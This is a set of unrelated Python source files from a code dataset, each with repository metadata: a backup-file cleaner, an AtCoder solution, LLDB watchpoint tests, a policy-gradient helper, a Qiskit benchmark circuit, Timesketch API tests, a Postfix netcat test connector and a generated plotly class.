] | permissive | mikadosoftware/weaver | 72832ff66efb8e352523126865ba1a89ad881ab2 | 58d35b72714a9be78d4bf31d9072b243469f5ffc | refs/heads/master | 2022-12-11T11:01:19.545070 | 2018-09-21T18:36:11 | 2018-09-21T18:36:11 | 76,447,730 | 0 | 0 | MIT | 2022-12-08T00:39:26 | 2016-12-14T10:04:52 | Python | UTF-8 | Python | false | false | 1,535 | py | #!/bin/env python
"""devclean
Usage:
devclean <rootpath> [--show]
devclean (-h | --help)
devclean --version
Options:
-h --help Show this screen.
--version Show version.
--show Only show dont kill files
"""
import os, sys
from fnmatch import fnmatch
from docopt import docopt
# Glob patterns for editor backup / bytecode litter that should be deleted.
crap_matcher = ['*.*~',
                '*.pyc',
                '#*#']
# Directory names the tree walk never descends into.
ignore_dirs = ['.git', '__pycache__']
def killfiles(kill_list, flag=False):
    '''Report every path in *kill_list*; when *flag* is true, also delete it.

    Deleted files are printed with an "[x]" marker, kept files with "[ ]".
    '''
    for path in kill_list:
        if not flag:
            print("[ ] ", path)
            continue
        os.remove(path)
        print("[x] ", path)
def clean_tree(cwd=None,
               killflag=False):
    '''Walk everything below *cwd* (default: current directory) and hand all
    files matching ``crap_matcher`` to :func:`killfiles`.

    :param cwd: root of the walk; falsy values fall back to os.getcwd()
    :param killflag: forwarded to killfiles -- True deletes, False only lists
    '''
    rdir = cwd or os.getcwd()
    kill_list = []
    for root, dirs, files in os.walk(rdir):
        # Prune ignored directories in place so os.walk skips them.
        # Bug fix: the original iterated over ``dirs`` while calling
        # dirs.remove() on it, which silently skips the element following
        # each removal (e.g. two ignored dirs listed back to back).
        dirs[:] = [d for d in dirs if d not in ignore_dirs]
        # Collect every file matching one of the junk glob patterns.
        for file in files:
            for pattern in crap_matcher:
                if fnmatch(file, pattern):
                    kill_list.append(os.path.join(root, file))
    killfiles(kill_list, killflag)
#entrypoint
def main():
    """Console entry point: parse the docopt arguments and run the cleaner."""
    arguments = docopt(__doc__)
    clean_tree(cwd=arguments['<rootpath>'],
               killflag=not arguments['--show'])
if __name__ == '__main__':
    # NOTE(review): running the file directly executes its doctests instead
    # of calling main(); the "#entrypoint" marker above main() suggests the
    # console command is wired up elsewhere (e.g. setuptools) -- confirm.
    import doctest
    doctest.testmod()
| [
"paul@mikadosoftware.com"
] | paul@mikadosoftware.com |
08b77271f6d9e743446b11420b21694f8c5cb7a8 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02767/s509630790.py | 134d80c81b5f5cf92ccd09bce8a4d9e1b91e7af6 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 165 | py | N = int(input())
# Read the N space-separated integers (N was read on the line above) and
# centre them on the rounded mean: the integer b minimising
# sum((x_i - b)**2) is the integer nearest the arithmetic mean.
X_list = list(map(int, input().split()))
# At an exact half-integer mean both neighbouring integers give an equal
# cost, so banker's rounding in round() cannot change the answer.
X_mean = round(sum(X_list) / N)
physical_sum = sum([(i - X_mean)**2 for i in X_list])
print(physical_sum) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
65e4cf82411c8c8153f0661d7ec0d14d2b426b00 | b29acb2e230b3cf2f8be070850c34ed5d62dc80c | /Python/YPS/Rensyu/08/Sample1.py | e365d37f505389fb63bb58af6d100aea58fe1491 | [] | no_license | MasatakaShibataSS/lesson | be6e3557c52c6157b303be268822cad613a7e0f7 | 4f3f81ba0161b820410e2a481b63a999d0d4338c | refs/heads/master | 2020-06-17T13:42:08.383167 | 2019-11-11T07:23:14 | 2019-11-11T07:23:14 | 195,940,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | class Car():
def __init__(self, num, gas):
    """Initialise a car with its plate number and fuel amount.

    :param num: licence-plate number
    :param gas: fuel amount
    """
    self.num = num
    self.gas = gas
def getNumber(self):
    """Return the car's licence-plate number (Java-style accessor)."""
    return self.num
def getGas(self):
    """Return the car's fuel amount (Java-style accessor)."""
    return self.gas
# Create two cars and read their state back through the accessors.
cr1 = Car(1234, 25.5)
n1 = cr1.getNumber()
g1 = cr1.getGas()
cr2 = Car(2345, 30.5)
n2 = cr2.getNumber()
g2 = cr2.getGas()
# Japanese output: "The number is <n>, the petrol amount is <g>."
print("ナンバーは", n1, "ガソリン量は", g1, "です。")
print("ナンバーは", n2, "ガソリン量は", g2, "です。")
| [
"masataka.shibata.ss@gmail.com"
] | masataka.shibata.ss@gmail.com |
7078dcee082ede20fd630e1599955619f9c49a3f | 9c006bd8b1f628200a63a194000836505f50be9b | /tools/lldb/test/functionalities/watchpoint/watchpoint_commands/command/TestWatchpointCommandLLDB.py | d2ba2ae6056b494007615c201f3531a9de244e39 | [
"NCSA"
] | permissive | hoangt/NyuziToolchain | a66989a1b9c71a2df782f9c573b0da62d1e0e9cf | 400aae2a01d38a1e836d7be33211aa8525c87070 | refs/heads/master | 2020-12-24T23:29:11.747602 | 2015-08-30T00:06:09 | 2015-08-30T00:06:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,631 | py | """
Test 'watchpoint command'.
"""
import os, time
import unittest2
import lldb
from lldbtest import *
import lldbutil
class WatchpointLLDBCommandTestCase(TestBase):
    """Exercise 'watchpoint command add' with LLDB command-line actions.

    Two scenarios are covered, each built for both dSYM and DWARF debug
    info: a watchpoint action that mutates a global, and one that disables
    its own watchpoint after the first hit.
    """

    mydir = TestBase.compute_mydir(__file__)

    def setUp(self):
        # Call super's setUp().
        TestBase.setUp(self)
        # Our simple source filename.
        self.source = 'main.cpp'
        # Find the line number to break inside main().
        self.line = line_number(self.source, '// Set break point at this line.')
        # And the watchpoint variable declaration line number.
        self.decl = line_number(self.source, '// Watchpoint variable declaration.')
        # Build dictionary to have unique executable names for each test method.
        self.exe_name = 'a%d.out' % self.test_number
        self.d = {'CXX_SOURCES': self.source, 'EXE': self.exe_name}

    @skipUnlessDarwin
    @dsym_test
    def test_watchpoint_command_with_dsym(self):
        """Test 'watchpoint command'."""
        self.buildDsym(dictionary=self.d)
        self.setTearDownCleanup(dictionary=self.d)
        self.watchpoint_command()

    @dwarf_test
    @expectedFailureAndroid(archs=['arm', 'aarch64']) # Watchpoints not supported
    def test_watchpoint_command_with_dwarf(self):
        """Test 'watchpoint command'."""
        self.buildDwarf(dictionary=self.d)
        self.setTearDownCleanup(dictionary=self.d)
        self.watchpoint_command()

    @skipUnlessDarwin
    @dsym_test
    def test_watchpoint_command_can_disable_a_watchpoint_with_dsym(self):
        """Test that 'watchpoint command' action can disable a watchpoint after it is triggered."""
        self.buildDsym(dictionary=self.d)
        self.setTearDownCleanup(dictionary=self.d)
        self.watchpoint_command_can_disable_a_watchpoint()

    @dwarf_test
    @expectedFailureAndroid(archs=['arm', 'aarch64']) # Watchpoints not supported
    def test_watchpoint_command_can_disable_a_watchpoint_with_dwarf(self):
        """Test that 'watchpoint command' action can disable a watchpoint after it is triggered."""
        self.buildDwarf(dictionary=self.d)
        self.setTearDownCleanup(dictionary=self.d)
        self.watchpoint_command_can_disable_a_watchpoint()

    def watchpoint_command(self):
        """Do 'watchpoint command add'."""
        exe = os.path.join(os.getcwd(), self.exe_name)
        self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)

        # Add a breakpoint to set a watchpoint when stopped on the breakpoint.
        lldbutil.run_break_set_by_file_and_line (self, None, self.line, num_expected_locations=1)

        # Run the program.
        self.runCmd("run", RUN_SUCCEEDED)

        # We should be stopped again due to the breakpoint.
        # The stop reason of the thread should be breakpoint.
        self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
            substrs = ['stopped',
                       'stop reason = breakpoint'])

        # Now let's set a write-type watchpoint for 'global'.
        self.expect("watchpoint set variable -w write global", WATCHPOINT_CREATED,
            substrs = ['Watchpoint created', 'size = 4', 'type = w',
                       '%s:%d' % (self.source, self.decl)])

        # The attached action forces 'cookie' to 777 when the watchpoint hits.
        self.runCmd('watchpoint command add 1 -o "expr -- cookie = 777"')

        # List the watchpoint command we just added.
        self.expect("watchpoint command list 1",
            substrs = ['expr -- cookie = 777'])

        # Use the '-v' option to do verbose listing of the watchpoint.
        # The hit count should be 0 initially.
        self.expect("watchpoint list -v",
            substrs = ['hit_count = 0'])

        self.runCmd("process continue")

        # We should be stopped again due to the watchpoint (write type).
        # The stop reason of the thread should be watchpoint.
        self.expect("thread backtrace", STOPPED_DUE_TO_WATCHPOINT,
            substrs = ['stop reason = watchpoint'])

        # Check that the watchpoint snapshoting mechanism is working.
        self.expect("watchpoint list -v",
            substrs = ['old value:', ' = 0',
                       'new value:', ' = 1'])

        # The watchpoint command "forced" our global variable 'cookie' to become 777.
        self.expect("frame variable --show-globals cookie",
            substrs = ['(int32_t)', 'cookie = 777'])

    def watchpoint_command_can_disable_a_watchpoint(self):
        """Test that 'watchpoint command' action can disable a watchpoint after it is triggered."""
        exe = os.path.join(os.getcwd(), self.exe_name)
        self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)

        # Add a breakpoint to set a watchpoint when stopped on the breakpoint.
        lldbutil.run_break_set_by_file_and_line (self, None, self.line, num_expected_locations=1)

        # Run the program.
        self.runCmd("run", RUN_SUCCEEDED)

        # We should be stopped again due to the breakpoint.
        # The stop reason of the thread should be breakpoint.
        self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
            substrs = ['stopped',
                       'stop reason = breakpoint'])

        # Now let's set a write-type watchpoint for 'global'.
        self.expect("watchpoint set variable -w write global", WATCHPOINT_CREATED,
            substrs = ['Watchpoint created', 'size = 4', 'type = w',
                       '%s:%d' % (self.source, self.decl)])

        # The attached action disables the watchpoint itself on first hit.
        self.runCmd('watchpoint command add 1 -o "watchpoint disable 1"')

        # List the watchpoint command we just added.
        self.expect("watchpoint command list 1",
            substrs = ['watchpoint disable 1'])

        # Use the '-v' option to do verbose listing of the watchpoint.
        # The hit count should be 0 initially.
        self.expect("watchpoint list -v",
            substrs = ['hit_count = 0'])

        self.runCmd("process continue")

        # We should be stopped again due to the watchpoint (write type).
        # The stop reason of the thread should be watchpoint.
        self.expect("thread backtrace", STOPPED_DUE_TO_WATCHPOINT,
            substrs = ['stop reason = watchpoint'])

        # Check that the watchpoint has been disabled.
        self.expect("watchpoint list -v",
            substrs = ['disabled'])

        self.runCmd("process continue")

        # There should be no more watchpoint hit and the process status should
        # be 'exited'.
        self.expect("process status",
            substrs = ['exited'])
if __name__ == '__main__':
    import atexit
    lldb.SBDebugger.Initialize()
    # Tear the debugger down even if unittest exits abruptly.
    atexit.register(lambda: lldb.SBDebugger.Terminate())
    unittest2.main()
| [
"jeffbush001@gmail.com"
] | jeffbush001@gmail.com |
7cf33ffd307ec8485e367021e0c782dd7af726bb | 27a580304382e3a79c7307f42a83b689566dbf30 | /reinforcement_learning/0x03-policy_gradients/policy_gradient.py | dff87a11d16bf082c2455db22eacbd163879aa68 | [] | no_license | salmenz/holbertonschool-machine_learning | a37712a125cd2e9e4bd6975c3bb2338f3533474f | a49eb348ff994f35b0efbbd5ac3ac8ae8ccb57d2 | refs/heads/master | 2023-07-11T06:00:36.162782 | 2021-08-11T17:45:35 | 2021-08-11T17:45:35 | 279,366,817 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | #!/usr/bin/env python3
"""policy gradient"""
import numpy as np
def policy(matrix, weight):
    """Softmax policy: action probabilities for the logits ``matrix.dot(weight)``.

    :param matrix: state/feature matrix (typically shape ``(1, n_features)``)
    :param weight: weight matrix, shape ``(n_features, n_actions)``
    :return: array of the same shape as ``matrix.dot(weight)`` whose entries
        are non-negative and sum to 1 over the whole result.
    """
    z = matrix.dot(weight)
    # Subtract the max logit before exponentiating for numerical stability;
    # the original np.exp(z) overflows to inf for large logits.  The shift
    # cancels in the ratio, so the probabilities are mathematically unchanged.
    exp = np.exp(z - np.max(z))
    return exp / np.sum(exp)
def softmax_grad(softmax):
    """Jacobian of the softmax function evaluated at the probability vector
    *softmax*: ``diag(s) - s s^T`` with ``s`` treated as a column vector."""
    col = np.reshape(softmax, (-1, 1))
    return np.diagflat(col) - col.dot(col.T)
def policy_gradient(state, weight):
    """Return ``(action, grad)``: the chosen action and d log pi(action)/d weight.

    NOTE(review): despite the original "Monte-Carlo" wording, the action is
    selected deterministically with argmax rather than sampled from the
    policy -- confirm this is intended before reuse.
    Assumes ``state`` is a single row vector (shape ``(1, n_features)``);
    the ``[0, action]`` index below relies on that.
    """
    action = np.argmax(policy(state, weight))
    # Row of the softmax Jacobian corresponding to the chosen action.
    softmax = softmax_grad(policy(state, weight))[action, :]
    # d log(softmax[action]) = d softmax[action] / softmax[action].
    log = softmax / policy(state, weight)[0, action]
    gradient = state.T.dot(log[None, :])
    return (action, gradient)
| [
"salmen.zooro@gmail.com"
] | salmen.zooro@gmail.com |
78c81bf41eaa5f3d6619327d769a73f98ac9db0b | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startQiskit1616.py | 5f4d304cc7b1179048c26042ec6efbd6cdbd56f6 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,491 | py | # qubit number=5
# total number=60
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
    # implement the oracle O_f^\pm
    # NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
    # or multi_control_Z_gate (issue #127)
    #
    # Phase oracle: for every n-bit string rep with f(rep) == "1", the X
    # gates map |rep> onto |11..1>, the multi-controlled phase flips its
    # sign, and the X gates are undone again.
    controls = QuantumRegister(n, "ofc")
    oracle = QuantumCircuit(controls, name="Zf")
    for i in range(2 ** n):
        rep = np.binary_repr(i, n)
        if f(rep) == "1":
            for j in range(n):
                if rep[j] == "0":
                    oracle.x(controls[j])
            # oracle.h(controls[n])
            if n >= 2:
                oracle.mcu1(pi, controls[1:], controls[0])
            for j in range(n):
                if rep[j] == "0":
                    oracle.x(controls[j])
    # oracle.barrier()
    return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
    """Build a Grover-style search circuit over ``n`` qubits for oracle ``f``.

    The Zf phase oracle is applied floor(sqrt(2**n) * pi / 4) times; the gate
    soup around it (the ``# number=...`` lines) appears machine-generated /
    mutated -- this file comes from a differential-testing benchmark, so do
    not expect the extra gates to have individual meaning.
    """
    # circuit begin
    input_qubit = QuantumRegister(n,"qc")
    classical = ClassicalRegister(n, "qm")
    prog = QuantumCircuit(input_qubit, classical)
    # Initial layer: Hadamards on the first four qubits plus mutated extras.
    prog.h(input_qubit[0]) # number=3
    prog.h(input_qubit[1]) # number=4
    prog.h(input_qubit[2]) # number=5
    prog.h(input_qubit[3]) # number=6
    prog.h(input_qubit[0]) # number=38
    prog.cz(input_qubit[1],input_qubit[0]) # number=39
    prog.h(input_qubit[0]) # number=40
    prog.h(input_qubit[0]) # number=49
    prog.cz(input_qubit[1],input_qubit[0]) # number=50
    prog.h(input_qubit[0]) # number=51
    prog.cx(input_qubit[1],input_qubit[0]) # number=52
    prog.z(input_qubit[1]) # number=53
    prog.h(input_qubit[0]) # number=57
    prog.cz(input_qubit[1],input_qubit[0]) # number=58
    prog.h(input_qubit[0]) # number=59
    prog.cx(input_qubit[1],input_qubit[0]) # number=47
    prog.h(input_qubit[0]) # number=32
    prog.cz(input_qubit[1],input_qubit[0]) # number=33
    prog.h(input_qubit[0]) # number=34
    prog.x(input_qubit[4]) # number=48
    prog.h(input_qubit[4]) # number=21
    Zf = build_oracle(n, f)

    # Standard Grover iteration count for an unstructured search of 2**n items.
    repeat = floor(sqrt(2 ** n) * pi / 4)
    for i in range(repeat):
        # Oracle followed by a (mutated) diffusion operator.
        prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
        prog.h(input_qubit[0]) # number=1
        prog.h(input_qubit[1]) # number=2
        prog.h(input_qubit[2]) # number=7
        prog.h(input_qubit[3]) # number=8
        prog.cx(input_qubit[3],input_qubit[0]) # number=41
        prog.z(input_qubit[3]) # number=42
        prog.cx(input_qubit[3],input_qubit[0]) # number=43
        prog.cx(input_qubit[1],input_qubit[3]) # number=44
        prog.x(input_qubit[0]) # number=9
        prog.h(input_qubit[1]) # number=56
        prog.x(input_qubit[1]) # number=10
        prog.x(input_qubit[2]) # number=11
        prog.rx(-2.9845130209103035,input_qubit[4]) # number=55
        prog.cx(input_qubit[0],input_qubit[3]) # number=35
        prog.x(input_qubit[3]) # number=36
        prog.cx(input_qubit[0],input_qubit[3]) # number=37
        if n>=2:
            prog.mcu1(pi,input_qubit[1:],input_qubit[0])
        prog.cx(input_qubit[1],input_qubit[0]) # number=24
        prog.x(input_qubit[0]) # number=25
        prog.cx(input_qubit[1],input_qubit[0]) # number=26
        prog.x(input_qubit[1]) # number=14
        prog.x(input_qubit[2]) # number=15
        prog.x(input_qubit[3]) # number=16
        prog.h(input_qubit[0]) # number=17
        prog.h(input_qubit[1]) # number=18
        prog.h(input_qubit[2]) # number=19
        prog.h(input_qubit[3]) # number=20
        prog.x(input_qubit[1]) # number=22
        prog.x(input_qubit[1]) # number=23
    # circuit end

    # Measure every qubit into its matching classical bit.
    for i in range(n):
        prog.measure(input_qubit[i], classical[i])

    return prog
if __name__ == '__main__':
    # Oracle marking the single key "00000": f(rep) == "1" iff rep == key.
    key = "00000"
    f = lambda rep: str(int(rep == key))
    prog = make_circuit(5,f)
    # Simulate the circuit, then transpile it against a fake device backend.
    backend = BasicAer.get_backend('qasm_simulator')

    sample_shot =7924
    info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
    backend = FakeVigo()
    circuit1 = transpile(prog,backend,optimization_level=2)

    # Dump the measurement counts plus the transpiled circuit's depth/drawing.
    writefile = open("../data/startQiskit1616.csv","w")
    print(info,file=writefile)
    print("results end", file=writefile)
    print(circuit1.depth(),file=writefile)
    print(circuit1,file=writefile)

    writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
016174c973cc6d5cc9d0073c0db0aed68af4d195 | 75d54a70d42f3790e917569172cde9b6969468cb | /timesketch/api/v1/resources_test.py | 13bf2ad68618a276a6b564f944363ea42a521818 | [
"Apache-2.0"
] | permissive | MarVinPL/timesketch | 792be04b8c9b1cab50bb6b5bf0096498bbc71b5b | 3c63cacef0f4ed4bbe826903ee5d708cc0502bb3 | refs/heads/master | 2021-01-15T20:33:36.816774 | 2015-03-26T08:53:27 | 2015-03-26T08:53:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,786 | py | # Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for v1 of the Timesketch API."""
import mock
import json
from timesketch.lib.definitions import HTTP_STATUS_CODE_CREATED
from timesketch.lib.definitions import HTTP_STATUS_CODE_BAD_REQUEST
from timesketch.lib.testlib import BaseTest
from timesketch.lib.testlib import MockDataStore
class SketchListResourceTest(BaseTest):
    """Test SketchListResource."""

    resource_url = '/api/v1/sketches/'

    def test_sketch_list_resource(self):
        """Authenticated request to get list of sketches."""
        self.login()
        response = self.client.get(self.resource_url)
        # The test fixtures expose exactly one sketch named 'Test 1'.
        self.assertEqual(len(response.json['objects']), 1)
        self.assertEqual(
            response.json['objects'][0][0]['name'], 'Test 1')
        self.assert200(response)
class SketchResourceTest(BaseTest):
    """Test SketchResource."""

    resource_url = '/api/v1/sketches/1/'

    def test_sketch_resource(self):
        """Authenticated request to get a sketch."""
        self.login()
        response = self.client.get(self.resource_url)
        # Sketch 1 has one timeline and the fixture name 'Test 1'.
        self.assertEqual(len(response.json['objects']), 1)
        self.assertEqual(len(response.json['objects'][0]['timelines']), 1)
        self.assertEqual(response.json['objects'][0]['name'], 'Test 1')
        self.assert200(response)

    def test_sketch_acl(self):
        """
        Authenticated request to get a sketch that the user do not have read
        permission on.
        """
        self.login()
        response = self.client.get('/api/v1/sketches/2/')
        self.assert403(response)
class ViewListResourceTest(BaseTest):
    """Test ViewListResource."""

    resource_url = '/api/v1/sketches/1/views/'

    def test_post_view_resource(self):
        """Authenticated request to create a view."""
        self.login()
        # 'filter' is a JSON-encoded string, matching what the UI submits.
        data = dict(name='test', query='test', filter='{}')
        response = self.client.post(
            self.resource_url, data=json.dumps(data),
            content_type='application/json')
        self.assertEquals(response.status_code, HTTP_STATUS_CODE_CREATED)
class ViewResourceTest(BaseTest):
    """Test ViewResource."""

    resource_url = '/api/v1/sketches/1/views/1/'

    def test_view_resource(self):
        """Authenticated request to get a view."""
        self.login()
        response = self.client.get(self.resource_url)
        self.assertEqual(len(response.json['objects']), 1)
        self.assertEqual(response.json['objects'][0]['name'], 'View 1')
        self.assert200(response)

    def test_invalid_user_in_view(self):
        """Authenticated request to get a view for another user."""
        self.login()
        # View 3 belongs to a different user -> forbidden.
        response = self.client.get('/api/v1/sketches/1/views/3/')
        self.assert403(response)

    def test_invalid_view(self):
        """Authenticated request to get a view for non existing view."""
        self.login()
        response = self.client.get('/api/v1/sketches/1/views/2/')
        self.assert404(response)
class ExploreResourceTest(BaseTest):
    """Test ExploreResource."""

    resource_url = '/api/v1/sketches/1/explore/'
    # Canned response the patched MockDataStore is expected to produce for
    # the query below.
    expected_response = {
        u'meta': {
            u'timeline_names': {
                u'test': u'Timeline 1'
            },
            u'timeline_colors': {
                u'test': u'FFFFFF'
            },
            u'es_total_count': 1,
            u'es_time': 5
        },
        u'objects': [
            {
                u'sort': [
                    1410593223000
                ],
                u'_type': u'plaso_event',
                u'_source': {
                    u'timestamp': 1410593222543942,
                    u'message': u'Test event',
                    u'label': [
                        u'__ts_star'
                    ],
                    u'timestamp_desc': u'Content Modification Time',
                    u'datetime': u'2014-09-13T07:27:03+00:00'
                },
                u'_score': u'null',
                u'_index': u'test',
                u'_id': u'test'
            }
        ]
    }

    @mock.patch(
        'timesketch.api.v1.resources.ElasticSearchDataStore', MockDataStore)
    def test_search(self):
        """Authenticated request to query the datastore."""
        self.login()
        response = self.client.get(self.resource_url + '?q=test&filter={}')
        self.assertDictEqual(response.json, self.expected_response)
        self.assert200(response)
class EventResourceTest(BaseTest):
    """Test EventResource."""

    resource_url = '/api/v1/sketches/1/event/'
    # Canned event payload returned by the patched MockDataStore.
    expected_response = {
        u'meta': {
            u'comments': []
        },
        u'objects': {
            u'timestamp_desc': u'',
            u'timestamp': 1410895419859714,
            u'label': u'',
            u'source_long': u'',
            u'source_short': u'',
            u'es_index': u'',
            u'es_id': u'',
            u'message': u'',
            u'datetime': u'2014-09-16T19:23:40+00:00'
        }
    }

    @mock.patch(
        'timesketch.api.v1.resources.ElasticSearchDataStore', MockDataStore)
    def test_get_event(self):
        """Authenticated request to get an event from the datastore."""
        self.login()
        response = self.client.get(
            self.resource_url + '?searchindex_id=test&event_id=test')
        self.assertDictEqual(response.json, self.expected_response)
        self.assert200(response)

    @mock.patch(
        'timesketch.api.v1.resources.ElasticSearchDataStore', MockDataStore)
    def test_invalid_index(self):
        """
        Authenticated request to get an event from the datastore, but in the
        wrong index.
        """
        self.login()
        response_400 = self.client.get(
            self.resource_url + '?searchindex_id=wrong_index&event_id=test')
        self.assert400(response_400)
class EventAnnotationResourceTest(BaseTest):
    """Test EventAnnotationResource."""

    resource_url = '/api/v1/sketches/1/event/annotate/'

    @mock.patch(
        'timesketch.api.v1.resources.ElasticSearchDataStore', MockDataStore)
    def test_post_annotate_resource(self):
        """Authenticated request to create an annotation."""
        self.login()
        # Both annotation flavours share the same endpoint; exercise each.
        for annotation_type in ['comment', 'label']:
            data = dict(
                annotation='test', annotation_type=annotation_type,
                event_id='test', searchindex_id='test')
            response = self.client.post(
                self.resource_url, data=json.dumps(data),
                content_type='application/json')
            self.assertIsInstance(response.json, dict)
            self.assertEquals(response.status_code, HTTP_STATUS_CODE_CREATED)

    def test_post_annotate_invalid_index_resource(self):
        """
        Authenticated request to create an annotation, but in the wrong index.
        """
        self.login()
        data = dict(
            annotation='test', annotation_type='comment',
            event_id='test', searchindex_id='invalid_searchindex')
        response = self.client.post(
            self.resource_url, data=json.dumps(data),
            content_type='application/json')
        self.assertEquals(response.status_code, HTTP_STATUS_CODE_BAD_REQUEST)
| [
"jberggren@gmail.com"
] | jberggren@gmail.com |
7092c7986651958a2883bb51380909307aebb640 | 10d89f178dc2e0f594c29c76aeef931c9525fbfd | /tests/.stage3_nonssl/verify_client.d/connector.py | 6629e2ada72684fa53ee0ef3791acf9a5f78acaf | [] | no_license | exphost/exphost.postfix | 7398bc629f02f5d8863535f3752e62a3214d0bb0 | abc770f66422b9bffc6b2223c6356cc846047065 | refs/heads/master | 2023-05-14T08:01:20.293965 | 2021-06-05T07:47:35 | 2021-06-05T08:09:58 | 365,591,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 172 | py | connector = "nc test.some.example.domain.xyz 25"
def setup_connector(host):
    # Install netcat on the target so the ``connector`` command defined above
    # can be executed.  ``host`` is presumably a testinfra host fixture with
    # the ansible backend -- confirm.  check=False makes the call best-effort
    # (e.g. it will not fail the test when nc is already installed).
    host.ansible(
        "command",
        "yum install -y nc",
        become=True,
        check=False,
    )
| [
"torgiren@gmail.com"
] | torgiren@gmail.com |
cd3fb7b1c5af5ec78d27e4e22f214c209953131b | 090a4e026addc9e78ed6118f09fd0d7d4d517857 | /graph_objs/candlestick/_decreasing.py | a63b2f5acb3f6c6939a7777ea542936faf4e0bab | [
"MIT"
] | permissive | wwwidonja/new_plotly | 0777365e53ea7d4b661880f1aa7859de19ed9b9a | 1bda35a438539a97c84a3ab3952e95e8848467bd | refs/heads/master | 2023-06-04T19:09:18.993538 | 2021-06-10T18:33:28 | 2021-06-10T18:33:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,701 | py | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Decreasing(_BaseTraceHierarchyType):
    """Style attributes for the decreasing (close < open) candles of a
    candlestick trace: a fill color and a bounding line."""

    # -- plotly object hierarchy metadata ---------------------------------
    _parent_path_str = "candlestick"
    _path_str = "candlestick.decreasing"
    _valid_props = {"fillcolor", "line"}

    # -- fillcolor ---------------------------------------------------------
    @property
    def fillcolor(self):
        """
        Sets the fill color. Defaults to a half-transparent variant of
        the line color, marker color, or marker line color, whichever
        is available.  Accepts a hex string, an rgb/rgba, hsl/hsla or
        hsv/hsva string, or any named CSS color.

        Returns
        -------
        str
        """
        return self["fillcolor"]

    @fillcolor.setter
    def fillcolor(self, val):
        self["fillcolor"] = val

    # -- line --------------------------------------------------------------
    @property
    def line(self):
        """
        Line style bounding the box(es); may be given as an instance of
        :class:`new_plotly.graph_objs.candlestick.decreasing.Line` or as a
        dict with compatible properties (``color``, ``width``).

        Returns
        -------
        new_plotly.graph_objs.candlestick.decreasing.Line
        """
        return self["line"]

    @line.setter
    def line(self, val):
        self["line"] = val

    # -- property description text used by generated documentation ---------
    @property
    def _prop_descriptions(self):
        return """\
        fillcolor
            Sets the fill color. Defaults to a half-transparent
            variant of the line color, marker color, or marker line
            color, whichever is available.
        line
            :class:`new_plotly.graph_objects.candlestick.decreasing.Lin
            e` instance or dict with compatible properties
        """

    def __init__(self, arg=None, fillcolor=None, line=None, **kwargs):
        """
        Construct a new Decreasing object

        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of
            :class:`new_plotly.graph_objs.candlestick.Decreasing`
        fillcolor
            Sets the fill color. Defaults to a half-transparent
            variant of the line color, marker color, or marker line
            color, whichever is available.
        line
            :class:`new_plotly.graph_objects.candlestick.decreasing.Lin
            e` instance or dict with compatible properties

        Returns
        -------
        Decreasing
        """
        super(Decreasing, self).__init__("decreasing")

        # Internal construction path: adopt the parent and stop early.
        if "_parent" in kwargs:
            self._parent = kwargs["_parent"]
            return

        # Normalise ``arg`` into a plain dict we can consume below.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the new_plotly.graph_objs.candlestick.Decreasing
constructor must be a dict or
an instance of :class:`new_plotly.graph_objs.candlestick.Decreasing`"""
            )

        self._skip_invalid = kwargs.pop("skip_invalid", False)
        self._validate = kwargs.pop("_validate", True)

        # Explicit keyword arguments take precedence over values in ``arg``.
        for prop, explicit in (("fillcolor", fillcolor), ("line", line)):
            pulled = arg.pop(prop, None)
            chosen = explicit if explicit is not None else pulled
            if chosen is not None:
                self[prop] = chosen

        # Remaining entries of ``arg`` plus unknown kwargs.
        self._process_kwargs(**dict(arg, **kwargs))

        self._skip_invalid = False
| [
"wwwidonja@gmail.com"
] | wwwidonja@gmail.com |
